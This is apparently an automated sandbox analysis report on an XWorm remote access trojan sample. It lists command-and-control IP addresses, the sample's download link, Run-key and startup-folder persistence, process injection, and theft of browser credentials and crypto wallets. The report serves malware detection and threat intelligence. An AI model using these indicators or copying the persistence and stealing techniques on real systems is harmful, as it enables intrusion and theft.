xworm | hxxps://gofile[.]io/d/js8e8K

Analysis

max time kernel
149s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
20-04-2024 12:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/js8e8K

Score

10^/10

xworm discovery evasion persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

185.216.70.22:7000

127.0.0.1:7000

185.239.237.162:7000

Attributes

Install_directory
%AppData%
install_file
GoogleUpdateCore.exe

Signatures

Detect Xworm Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe	family_xworm
behavioral1/memory/5608-185-0x0000000000B80000-0x0000000000B98000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Roaming\discord.exe	family_xworm
behavioral1/memory/5452-344-0x0000000000970000-0x000000000098E000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

WAlletsd.exeupdater.exe

description	pid	process	target process
PID 668 created 3444	668	WAlletsd.exe	Explorer.EXE
PID 668 created 3444	668	WAlletsd.exe	Explorer.EXE
PID 668 created 3444	668	WAlletsd.exe	Explorer.EXE
PID 668 created 3444	668	WAlletsd.exe	Explorer.EXE
PID 668 created 3444	668	WAlletsd.exe	Explorer.EXE
PID 668 created 3444	668	WAlletsd.exe	Explorer.EXE
PID 6196 created 3444	6196	updater.exe	Explorer.EXE
PID 6196 created 3444	6196	updater.exe	Explorer.EXE
PID 6196 created 3444	6196	updater.exe	Explorer.EXE
PID 6196 created 3444	6196	updater.exe	Explorer.EXE
PID 6196 created 3444	6196	updater.exe	Explorer.EXE
PID 6196 created 3444	6196	updater.exe	Explorer.EXE

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

WAlletsd.exeupdater.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts WAlletsd.exe
File created C:\Windows\System32\drivers\etc\hosts updater.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	WAlletsd.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Vapev41.exeVapeV4.exeGoogleUpdateCore.exeVape Updated.exediscord.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	Vapev41.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	VapeV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	GoogleUpdateCore.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	Vape Updated.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	discord.exe

Drops startup file 2 IoCs

Processes:

discord.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk	discord.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk	discord.exe

Executes dropped EXE 14 IoCs

Processes:

Vapev41.exeGoogleUpdateCore.exeVapeV4.exeGoogleUpdateCore.exeVape Updated.exeVape.exeVape.exeWAlletsd.exediscord.exebound.exeupdater.exerar.exeGoogleUpdateCore.exediscord.exe

pid	process
5728	Vapev41.exe
5608	GoogleUpdateCore.exe
1124	VapeV4.exe
4556	GoogleUpdateCore.exe
5372	Vape Updated.exe
2672	Vape.exe
5828	Vape.exe
668	WAlletsd.exe
5452	discord.exe
1924	bound.exe
6196	updater.exe
3428	rar.exe
5212	GoogleUpdateCore.exe
2320	discord.exe

Loads dropped DLL 17 IoCs

Processes:

Vape.exe

pid	process
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe
5828	Vape.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

820 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
820	icacls.exe

UPX packed file 39 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI26722\python311.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\libffi-8.dll	upx
behavioral1/memory/5828-342-0x00007FFB06160000-0x00007FFB0616F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\_socket.pyd	upx
behavioral1/memory/5828-375-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmp	upx
behavioral1/memory/5828-374-0x00007FFAF15B0000-0x00007FFAF15D3000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\libssl-3.dll	upx
behavioral1/memory/5828-376-0x00007FFADECF0000-0x00007FFADF210000-memory.dmp	upx
behavioral1/memory/5828-378-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmp	upx
behavioral1/memory/5828-381-0x00007FFB06150000-0x00007FFB0615D000-memory.dmp	upx
behavioral1/memory/5828-380-0x00007FFAF1410000-0x00007FFAF1429000-memory.dmp	upx
behavioral1/memory/5828-384-0x00007FFAF12C0000-0x00007FFAF12D4000-memory.dmp	upx
behavioral1/memory/5828-385-0x00007FFB05FD0000-0x00007FFB05FDD000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\libcrypto-3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\_ssl.pyd	upx
behavioral1/memory/5828-398-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\select.pyd	upx
behavioral1/memory/5828-366-0x00007FFAF1850000-0x00007FFAF1869000-memory.dmp	upx
behavioral1/memory/5828-363-0x00007FFAF1870000-0x00007FFAF189D000-memory.dmp	upx
behavioral1/memory/5828-360-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\_bz2.pyd	upx
behavioral1/memory/5828-338-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp	upx
behavioral1/memory/5828-434-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp	upx
behavioral1/memory/5828-484-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp	upx
behavioral1/memory/4916-498-0x00000274212D0000-0x00000274212E0000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI26722\_ctypes.pyd	upx
behavioral1/memory/5828-546-0x00007FFADECF0000-0x00007FFADF210000-memory.dmp	upx
behavioral1/memory/5828-320-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp	upx
behavioral1/memory/5828-561-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmp	upx
behavioral1/memory/5828-562-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmp	upx
behavioral1/memory/5828-610-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp	upx
behavioral1/memory/5828-637-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmp	upx
behavioral1/memory/5828-695-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp	upx
behavioral1/memory/5828-852-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp	upx
behavioral1/memory/5828-858-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmp	upx
behavioral1/memory/5828-853-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

bound.exeGoogleUpdateCore.exediscord.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	bound.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateCore = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdateCore.exe"	GoogleUpdateCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Roaming\\discord.exe"	discord.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

112 ip-api.com
119 ip-api.com

flow	ioc
112	ip-api.com
119	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 6196 set thread context of 1348	6196	updater.exe	conhost.exe
PID 6196 set thread context of 7120	6196	updater.exe	explorer.exe

Drops file in Program Files directory 1 IoCs

Processes:

WAlletsd.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe WAlletsd.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

6172 sc.exe
384 sc.exe
4908 sc.exe
2356 sc.exe
5680 sc.exe
6128 sc.exe
7104 sc.exe
220 sc.exe
5388 sc.exe
6576 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5984 schtasks.exe
6696 schtasks.exe
6716 schtasks.exe
5776 schtasks.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

3952 WMIC.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

2800 tasklist.exe
5668 tasklist.exe
2204 tasklist.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	WAlletsd.exe

pid	process
6172	sc.exe
384	sc.exe
4908	sc.exe
2356	sc.exe
5680	sc.exe
6128	sc.exe
7104	sc.exe
220	sc.exe
5388	sc.exe
6576	sc.exe

pid	process
5984	schtasks.exe
6696	schtasks.exe
6716	schtasks.exe
5776	schtasks.exe

pid	process
3952	WMIC.exe

pid	process
2800	tasklist.exe
5668	tasklist.exe
2204	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3364 systeminfo.exe

pid	process
3364	systeminfo.exe

Kills process with taskkill 10 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
6732	taskkill.exe
6112	taskkill.exe
3332	taskkill.exe
5772	taskkill.exe
6616	taskkill.exe
6212	taskkill.exe
6960	taskkill.exe
6172	taskkill.exe
6592	taskkill.exe
6264	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings msedge.exe
NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 235853.crdownload:SmartScreen msedge.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3700 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

GoogleUpdateCore.exe

pid process

5608 GoogleUpdateCore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings	msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 235853.crdownload:SmartScreen	msedge.exe

pid	process
3700	PING.EXE

pid	process
5608	GoogleUpdateCore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWAlletsd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4984	msedge.exe
4984	msedge.exe
3512	msedge.exe
3512	msedge.exe
1716	identity_helper.exe
1716	identity_helper.exe
1388	msedge.exe
1388	msedge.exe
2316	powershell.exe
2316	powershell.exe
2316	powershell.exe
3652	powershell.exe
3652	powershell.exe
3652	powershell.exe
3584	powershell.exe
3584	powershell.exe
5292	powershell.exe
5292	powershell.exe
2832	powershell.exe
2832	powershell.exe
5292	powershell.exe
5292	powershell.exe
4916	powershell.exe
4916	powershell.exe
3584	powershell.exe
3584	powershell.exe
4944	powershell.exe
4944	powershell.exe
2764	powershell.exe
2764	powershell.exe
2832	powershell.exe
2832	powershell.exe
4944	powershell.exe
2764	powershell.exe
6464	powershell.exe
6464	powershell.exe
4916	powershell.exe
4916	powershell.exe
6464	powershell.exe
668	WAlletsd.exe
668	WAlletsd.exe
7140	powershell.exe
7140	powershell.exe
7140	powershell.exe
7024	powershell.exe
7024	powershell.exe
7024	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
668	WAlletsd.exe
668	WAlletsd.exe
668	WAlletsd.exe
668	WAlletsd.exe
668	WAlletsd.exe
668	WAlletsd.exe
668	WAlletsd.exe
668	WAlletsd.exe
2480	powershell.exe
2480	powershell.exe
668	WAlletsd.exe
668	WAlletsd.exe
2480	powershell.exe
5164	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

Processes:

msedge.exe

pid	process
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

GoogleUpdateCore.exeGoogleUpdateCore.exepowershell.exediscord.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	5608	GoogleUpdateCore.exe
Token: SeDebugPrivilege	4556	GoogleUpdateCore.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	5452	discord.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	5292	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	5668	tasklist.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	2800	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3724	WMIC.exe
Token: SeSecurityPrivilege	3724	WMIC.exe
Token: SeTakeOwnershipPrivilege	3724	WMIC.exe
Token: SeLoadDriverPrivilege	3724	WMIC.exe
Token: SeSystemProfilePrivilege	3724	WMIC.exe
Token: SeSystemtimePrivilege	3724	WMIC.exe
Token: SeProfSingleProcessPrivilege	3724	WMIC.exe
Token: SeIncBasePriorityPrivilege	3724	WMIC.exe
Token: SeCreatePagefilePrivilege	3724	WMIC.exe
Token: SeBackupPrivilege	3724	WMIC.exe
Token: SeRestorePrivilege	3724	WMIC.exe
Token: SeShutdownPrivilege	3724	WMIC.exe
Token: SeDebugPrivilege	3724	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3724	WMIC.exe
Token: SeRemoteShutdownPrivilege	3724	WMIC.exe
Token: SeUndockPrivilege	3724	WMIC.exe
Token: SeManageVolumePrivilege	3724	WMIC.exe
Token: 33	3724	WMIC.exe
Token: 34	3724	WMIC.exe
Token: 35	3724	WMIC.exe
Token: 36	3724	WMIC.exe
Token: SeDebugPrivilege	2204	tasklist.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeIncreaseQuotaPrivilege	3724	WMIC.exe
Token: SeSecurityPrivilege	3724	WMIC.exe
Token: SeTakeOwnershipPrivilege	3724	WMIC.exe
Token: SeLoadDriverPrivilege	3724	WMIC.exe
Token: SeSystemProfilePrivilege	3724	WMIC.exe
Token: SeSystemtimePrivilege	3724	WMIC.exe
Token: SeProfSingleProcessPrivilege	3724	WMIC.exe
Token: SeIncBasePriorityPrivilege	3724	WMIC.exe
Token: SeCreatePagefilePrivilege	3724	WMIC.exe
Token: SeBackupPrivilege	3724	WMIC.exe
Token: SeRestorePrivilege	3724	WMIC.exe
Token: SeShutdownPrivilege	3724	WMIC.exe
Token: SeDebugPrivilege	3724	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3724	WMIC.exe
Token: SeRemoteShutdownPrivilege	3724	WMIC.exe
Token: SeUndockPrivilege	3724	WMIC.exe
Token: SeManageVolumePrivilege	3724	WMIC.exe
Token: 33	3724	WMIC.exe
Token: 34	3724	WMIC.exe
Token: 35	3724	WMIC.exe
Token: 36	3724	WMIC.exe
Token: SeDebugPrivilege	6464	powershell.exe
Token: SeDebugPrivilege	7140	powershell.exe
Token: SeDebugPrivilege	7024	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeShutdownPrivilege	5420	powercfg.exe
Token: SeCreatePagefilePrivilege	5420	powercfg.exe
Token: SeShutdownPrivilege	812	powercfg.exe
Token: SeCreatePagefilePrivilege	812	powercfg.exe

Suspicious use of FindShellTrayWindow 47 IoCs

Processes:

msedge.exe

pid	process
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

discord.exe

pid process

5452 discord.exe

pid	process
5452	discord.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3512 wrote to memory of 2784	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 2784	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4548	3512	msedge.exe	msedge.exe
